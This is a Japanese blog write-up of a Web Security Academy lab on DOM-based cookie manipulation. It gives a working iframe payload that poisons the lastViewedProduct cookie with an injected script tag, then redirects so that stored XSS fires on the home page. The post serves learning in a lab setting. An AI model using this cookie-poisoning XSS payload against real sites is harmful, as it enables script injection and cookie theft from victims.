Shikata Ga Nai

Private? There is no such things.

DOM-based cookie manipulationをやってみた

Hello there, ('ω')ノ

 

DOMベースのCookie操作を。

 

このラボでは、DOMベースのクライアント側のCookie操作について説明して。

ラボを解決するには、別のページにXSSを発生させるCookieを挿入して。

 

まずは、Last viewed productメニューを表示させてクリックすると。

 

f:id:ThisIsOne:20210319163237p:plain

 

パラメータが確認できて。

 /product?productId=1

 

f:id:ThisIsOne:20210319163209p:plain

 

さらにはCookieへの保存も確認できて。

 lastViewedProduct=https://ac761f471fbf541a804e273500cf00c2.web-security-academy.net/product?productId=1

 

f:id:ThisIsOne:20210319190227p:plain

 

下記のエクスプロイトを保存して。

 

<iframe src="https://ac761f471fbf541a804e273500cf00c2.web-security-academy.net/product?productId=1&'><script>alert(document.cookie)</script>" onload="if(!window.x)this.src='https://ac761f471fbf541a804e273500cf00c2.web-security-academy.net';window.x=1;">

 

iframeが初めて読み込まれると、ブラウザは一時的に悪意のあるURLを開いて。lastViewedProductCookieの値として保存されて。

 

onloadは、ホームページにリダイレクトして。

被害者のブラウザにポイズンされたCookieが保存されている間は。

ホームページをロードするとペイロードが実行されて。

 

f:id:ThisIsOne:20210320092749p:plain

 

Deliver exploit to victimで、送信すると。

 

f:id:ThisIsOne:20210319163648p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210319163707p:plain

 

ちなみにView exploitでエクスプロイトを確認してみると。

 

f:id:ThisIsOne:20210319163736p:plain

 

Best regards, (^^ゞ